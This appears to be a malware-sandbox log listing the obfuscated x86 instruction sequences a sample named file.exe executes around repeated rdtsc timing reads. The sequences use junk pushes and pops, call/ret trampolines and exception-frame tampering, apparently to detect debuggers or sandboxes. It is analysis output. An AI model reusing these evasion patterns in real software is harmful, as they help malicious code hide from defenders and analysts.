Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8206C second address: D82092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jng 00007F99D0DE6F26h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82092 second address: D820A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D820A0 second address: D820A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A85 second address: D86A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A89 second address: D86A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86A8D second address: D86A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86C8E second address: D86C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87C4F second address: D87C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A76 second address: D88A80 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A80 second address: D88A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87C53 second address: D87CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 and edi, dword ptr [ebp+122D2C9Bh] 0x00000018 jbe 00007F99D0DE6F2Eh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F99D0DE6F28h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f pushad 0x00000040 jl 00007F99D0DE6F2Ch 0x00000046 mov esi, dword ptr [ebp+122D2B97h] 0x0000004c mov dword ptr [ebp+122D312Dh], eax 0x00000052 popad 0x00000053 mov eax, dword ptr [ebp+122D0D85h] 0x00000059 mov ebx, edi 0x0000005b push FFFFFFFFh 0x0000005d mov edi, dword ptr [ebp+124655B3h] 0x00000063 nop 0x00000064 pushad 0x00000065 jnc 00007F99D0DE6F2Ch 0x0000006b jmp 00007F99D0DE6F32h 0x00000070 popad 0x00000071 push eax 0x00000072 pushad 0x00000073 jmp 00007F99D0DE6F2Ah 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A86 second address: D88A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88A8A second address: D88B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F99D0DE6F2Eh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F99D0DE6F28h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jnl 00007F99D0DE6F2Ch 0x00000032 and edi, dword ptr [ebp+122D297Fh] 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D33B9h], edi 0x00000040 push 00000000h 0x00000042 sub dword ptr [ebp+122D33B9h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a jmp 00007F99D0DE6F30h 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F99D0DE6F2Bh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D88CC8 second address: D88CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8BB8C second address: D8BB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C176 second address: D8C192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D212 second address: D8D21C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99D0DE6F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D21C second address: D8D272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3814h], ecx 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov eax, dword ptr [ebp+1245B9ABh] 0x00000018 mov edx, 3F24838Bh 0x0000001d popad 0x0000001e push 00000000h 0x00000020 jmp 00007F99D0D12E22h 0x00000025 xchg eax, esi 0x00000026 jng 00007F99D0D12E2Ch 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 pop edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8C35C second address: D8C36C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0DE6F2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E255 second address: D8E25F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E25F second address: D8E265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E265 second address: D8E269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D3B3 second address: D8D3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D900B8 second address: D90130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F99D0D12E23h 0x0000000d pop edi 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F99D0D12E18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F99D0D12E18h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 mov ebx, edi 0x00000049 pushad 0x0000004a mov si, dx 0x0000004d xor dword ptr [ebp+12470F18h], ebx 0x00000053 popad 0x00000054 xchg eax, esi 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90130 second address: D90146 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F99D0DE6F2Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90146 second address: D9014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9014C second address: D90150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9112F second address: D91134 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91FD1 second address: D9201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc ebx, 4B9FD111h 0x0000000f push 00000000h 0x00000011 xor dword ptr [ebp+122D17C2h], eax 0x00000017 mov ebx, 33F176F7h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F99D0DE6F28h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D2A73h] 0x0000003e push eax 0x0000003f push eax 0x00000040 pushad 0x00000041 jbe 00007F99D0DE6F26h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9025D second address: D90261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90261 second address: D9027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9027D second address: D90282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D90282 second address: D90288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93DF4 second address: D93E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F99D0D12E18h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov ebx, 1A55EA9Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F99D0D12E18h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jnp 00007F99D0D12E22h 0x00000050 jc 00007F99D0D12E1Ch 0x00000056 sub dword ptr [ebp+122D36A7h], edi 0x0000005c mov edi, dword ptr [ebp+124656F1h] 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93E70 second address: D93E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F393 second address: D8F397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F397 second address: D8F39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D921CB second address: D921CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D96C09 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33D5C second address: D33D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94EE7 second address: D94F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F99D0DE6F40h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99D0DE6F32h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D99313 second address: D99318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDA4 second address: D9FDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDAA second address: D9FDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDB2 second address: D9FDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDB8 second address: D9FDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDBE second address: D9FDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F99D0DE6F26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDCE second address: D9FDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FDD2 second address: D9FDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4C7 second address: D9F4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4DA second address: D9F4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4DE second address: D9F4F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F99D0D12E57h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F4F3 second address: D9F51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99D0DE6F26h 0x0000000a jp 00007F99D0DE6F26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F39h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F980 second address: D9F988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F988 second address: D9F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5579 second address: DA5582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5667 second address: DA56CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jno 00007F99D0DE6F2Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F99D0DE6F39h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F99D0DE6F35h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F99D0DE6F2Bh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5770 second address: BBEA6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 472AFCC5h 0x0000000f jmp 00007F99D0D12E1Eh 0x00000014 push dword ptr [ebp+122D13FDh] 0x0000001a clc 0x0000001b call dword ptr [ebp+122D3960h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2374h], eax 0x00000028 xor eax, eax 0x0000002a je 00007F99D0D12E1Eh 0x00000030 jmp 00007F99D0D12E20h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jmp 00007F99D0D12E1Dh 0x0000003e mov dword ptr [ebp+122D2CCFh], eax 0x00000044 pushad 0x00000045 pushad 0x00000046 xor edi, dword ptr [ebp+122D2CB7h] 0x0000004c popad 0x0000004d mov si, di 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 mov dword ptr [ebp+122D285Ah], eax 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007F99D0D12E27h 0x00000065 lodsw 0x00000067 jg 00007F99D0D12E1Ch 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jno 00007F99D0D12E1Ch 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jp 00007F99D0D12E1Ch 0x00000081 mov dword ptr [ebp+122D2374h], ebx 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b pushad 0x0000008c popad 0x0000008d jmp 00007F99D0D12E23h 0x00000092 popad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D330 second address: D2D334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D334 second address: D2D354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F99D0D12E22h 0x0000000c jmp 00007F99D0D12E1Ch 0x00000011 jp 00007F99D0D12E22h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D354 second address: D2D362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99D0DE6F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D362 second address: D2D36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99D0D12E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D36C second address: D2D372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA3B2 second address: DAA3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007F99D0D12E25h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 jno 00007F99D0D12E16h 0x0000001f jmp 00007F99D0D12E1Dh 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA3F3 second address: DAA3F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA580 second address: DAA586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA586 second address: DAA5B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99D0DE6F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F99D0DE6F36h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA763 second address: DAA773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0D12E1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA773 second address: DAA777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA777 second address: DAA792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99D0D12E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 jnp 00007F99D0D12E26h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA792 second address: DAA798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA2A second address: DAAA30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA30 second address: DAAA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA36 second address: DAAA3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA3A second address: DAAA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99D0DE6F36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAAA61 second address: DAAA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F99D0D12E16h 0x0000000a popad 0x0000000b jc 00007F99D0D12E18h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF498 second address: DAF4C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F99D0DE6F2Ch 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF4C0 second address: DAF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF771 second address: DAF79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99D0DE6F31h 0x00000009 popad 0x0000000a jmp 00007F99D0DE6F2Bh 0x0000000f push esi 0x00000010 jg 00007F99D0DE6F26h 0x00000016 pop esi 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFB9F second address: DAFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
